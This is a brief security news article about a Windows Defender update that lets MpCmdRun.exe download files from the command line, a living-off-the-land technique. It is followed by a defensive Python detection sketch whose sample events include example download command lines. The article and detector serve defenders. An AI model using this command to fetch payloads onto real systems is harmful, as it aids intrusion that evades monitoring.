Windows Defender's new feature worries security researchers


Windows Defender has added a new feature and security researchers are not too happy, as it has increased the attack surface of Windows.

Version 4.18.2007.9 or 4.18.2009.9 of the app added the ability to download files from the command line, e.g.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

… can now be used to download a binary from the internet.

While not an exploit in itself, the feature allows a script that can launch the command line to pull further files from the internet using a native binary, one of the so-called living-off-the-land binaries, or LOLBINs.

Adding the feature to Windows Defender means there is another app admins have to keep an eye on and another app which hackers can exploit.

Fortunately, Windows Defender does still scan the apps it downloads, but this is of course not infallible.
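A defender-side sketch of the monitoring this implies, added here as an example and not taken from the original article or from Microsoft: it scans process-creation records for MpCmdRun.exe invoked with -DownloadFile and extracts the URL and save path. The event field names (host, image, command_line) and every sample value are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (not real telemetry). Field names are
# assumptions; map them to whatever your EDR or Sysmon pipeline emits.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "command_line": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"host": "ws-02", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "command_line": r'MpCmdRun.exe -DownloadFile -url https://files.example.test/a.bin -path "C:\Users\Public\a.bin"'},
    {"host": "ws-03", "image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\<version>\mpcmdrun.exe",
     "command_line": r'mpcmdrun.exe -downloadfile -URL "http://198.51.100.7/p" -PATH C:\Temp\p.exe'},
    {"host": "ws-04", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c echo MpCmdRun.exe -DownloadFile'},
]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(command_line):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [quoted or bare for quoted, bare in TOKEN.findall(command_line)]

def detect_download(event):
    """Return a finding dict if the event is MpCmdRun.exe -DownloadFile, else None."""
    image_name = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image_name != "mpcmdrun.exe":
        return None
    tokens = tokenize(event["command_line"])
    switches = [t.lower() for t in tokens]  # switch matching is case-insensitive
    if "-downloadfile" not in switches:
        return None

    def value_of(switch):
        # A switch's value is the token that follows it; None if absent.
        i = switches.index(switch) if switch in switches else -1
        return tokens[i + 1] if 0 <= i < len(tokens) - 1 else None

    url = value_of("-url")
    return {"host": event["host"], "url": url,
            "remote_host": urlparse(url).hostname if url else None,
            "saved_to": value_of("-path")}

def scan(events):
    return [finding for finding in map(detect_download, events) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
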

The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer.
